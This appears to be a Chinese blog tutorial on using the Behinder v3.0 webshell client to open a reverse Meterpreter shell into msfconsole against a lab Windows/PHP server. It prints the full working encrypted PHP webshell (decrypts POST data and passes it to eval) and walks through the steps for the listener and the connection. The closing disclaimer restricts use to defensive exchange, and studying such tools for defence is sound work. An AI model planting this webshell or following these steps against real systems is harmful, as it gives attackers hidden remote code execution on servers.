冰蝎下的反弹shell连接msfconsole
文章目录
- 前言
- 一、使用木马getshell
- 1.搭建环境
- 二、冰蝎配置
- 三、kali监听
- 总结
前言
好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。
一、使用木马getshell
冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。
这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就应该这样操作。因为手底下没有现成的webshell。我就去网上找了那些一句话木马,或者可以绕过waf的木马。尝试都无果。后来看了一篇关于冰蝎反弹shell的文章。文章中介绍的是本地环境问题,将PHP的版本改到7.0以上就可以执行了。尝试无果。经过尝试发现冰蝎的脚本得使用对应版本的shell。之前都是一套下载使用的没怎么注意,这次掉坑了。
1.搭建环境
- 靶机:win 2008
- 环境:phpstudy 2016
- 冰蝎:v3.0
因为本地测试,文章以反弹shell为主,就直接将shell拖到服务器了。这里挂一下3.0中PHP的一句话代码。
<?php
@error_reporting(0);
session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$_SESSION['k']=$key;$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++) {$post[$i] = $post[$i]^$key[$i+1&15]; }}else{$post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>
有兴趣的可以研究一下代码。
二、冰蝎配置
- 新建shell,点击保存
- 进入反弹shell配置界面
- 选择Meterpreter功能
- 根据冰蝎的温馨提示,使用kali进行监听就行了。
三、kali监听
我这里Mac上装了msfconsole就直接来演示了
- 启动msf
- 使用exp
- 设置payload
- 查看设置
- 配置本机地址和监听端口
- 开始监听
- 冰蝎发送数据建立连接
- 执行命令
总结
总的来说跟用msf生成exe木马,监听木马一样的流程。只不过这里的冰蝎代替了exe来执行。文中有几处不太坚定的答案。还希望好心的大佬给出确定的解答。初级工具使用,仅用于基础信息防御交流,请勿用于其他用途。
冰蝎下的反弹shell连接msfconsole相关推荐
- nc——制作后门连接与反弹shell连接的使用
一.nc参数 -g<网关> 设置路由器跃程通信网关,最多可设置8个 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数 -h 在线帮助 -i<延迟秒数> 设置 ...
- Windows下的反弹shell
今天学习内容就是反弹shell啦~~ 当服务器端攻击客户端时,此时客户端IP地址未知,所以要使用反向shell 在这里分别写服务器端代码和客户端代码:注:每次运行时要先开服务器端 服务器端(攻击者,导 ...
- Shell管理工具流量分析-下(冰蝎 3.0、哥斯拉 4.0 流量分析)
书接上篇,再分析冰蝎 2.0 之后来看一看 3.0 拥有那些新特性 文章目录 冰蝎 3.0流量 功能原理分析 哥斯拉 使用介绍 PHP加密器分析 推荐阅读 冰蝎 3.0流量 冰蝎 3.0 PHP sh ...
- Web shell 与 冰蝎、蚁剑、哥斯拉(新手必看)
一.Web木马的概念 web木马:用Web系统语言(如:ASO,PHP,JSP等)编写的木马,木马上传服务器后当成页面被攻击者访问,常当做后门. Web木马危害: 做后门: 文件,数据库操作: 修改W ...
- 32位md5解密_冰蝎特征检测及报文解密
点击"蓝字"关注我们,不迷路~前言 19年驻场于某金融单位.参加19年9月.11月两次攻防演练,负责攻防演练组织.技术支持和复盘.期间,多个攻击队伍使用冰蝎 webshell ...
- 冰蝎加密 WebShell 过杀软
用Web系统语言(如:ASP.PHP.JSP等)编写的WebShell,WebShell上传服务器后当成页面被攻击者访问,常当做后门. WebShell危害 做后门: 文件.数据库操作: 修改Web ...
- 32_behinder(冰蝎)
behinder(冰蝎) 一.冰蝎的连接 先打开冰蝎,注意jdk版本,可能会影响 打开后界面如下 点击传输协议,生成shell.jsp 协议名称选择aes,里面有个key,需要用密码的md5值32位加 ...
- 冰蝎Behinder_v4.0
目录 一.冰蝎4.0☕️ 二.流量特征问题☕️ 三.工作流程☕️ 四.演示过程☕️ 五.流量检测☕️ 一.冰蝎4.0☕️ 冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由 ...
- linux 反弹shell(二)反弹shell的本质
0X00 前言 在上一篇文章 Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最核心也是相对较难理解的部分,那么接下来我们就可以正式借反弹shell的实例分析回顾前一 ...
最新文章
- Apache和Tomcat的区别是什么?
- mysql limit耗时过长
- 通过Kubernetes安全高效管理边缘节点,ACK@Edge年度重磅发布
- 一条语句判断数x是否2的n次幂.求取二进制1的个数
- ❤️《小黄鸭调试法》程序员必备技能!!!❤️
- Good Bye 2018 (A~F, H)
- ubuntu 出错 /etc/sudoers is world writable
- 演练Ext JS 4.2自定义主题
- 本地代码上传github
- eclipsemaven服务器显示404,eclipse-HTTP状态404-请求的资源(/)不可用
- java实现调用打印机
- 让研发团队找准市场需求
- 原创:iPad 2第一次开机与激活指南
- sicily 4379 bicoloring
- Win10 OpenGL安装及配置
- androidjni开发!应聘高级Android工程师历程感言,快来收藏!
- 4个基本不等式的公式高中_高中数学基本不等式知识点
- 星星之火OIer:篱笆题解
- Linux桌面i3与i7,IT小干货 | i3.i5.i7.i9有什么区别?桌面篇
- 小记 百度地图 soso地图 经纬度偏移
热门文章
- Navicat Premium 12 中文版v12.1.19
- Byte学堂:共享单车数据处理原理及分析方法
- 路由器连接上但上不了网原因及解决方法
- 年末去字节跳动面试,居然被面试官问的哑口无言,原因竟然是这个!!!
- 上个厕所的功夫,搞懂MySQL事务隔离级别,Java学习视频百度云盘
- 测试人员绩效考核KPI指标
- visual studio code下载慢解决办法
- 干货!高速串行Serdes均衡之FFE
- 认识微型计算机 ppt,认识微型计算机(PPT课件).ppt
- Highcharts 写 venn图 (韦恩图),以及解决项目中venn的报错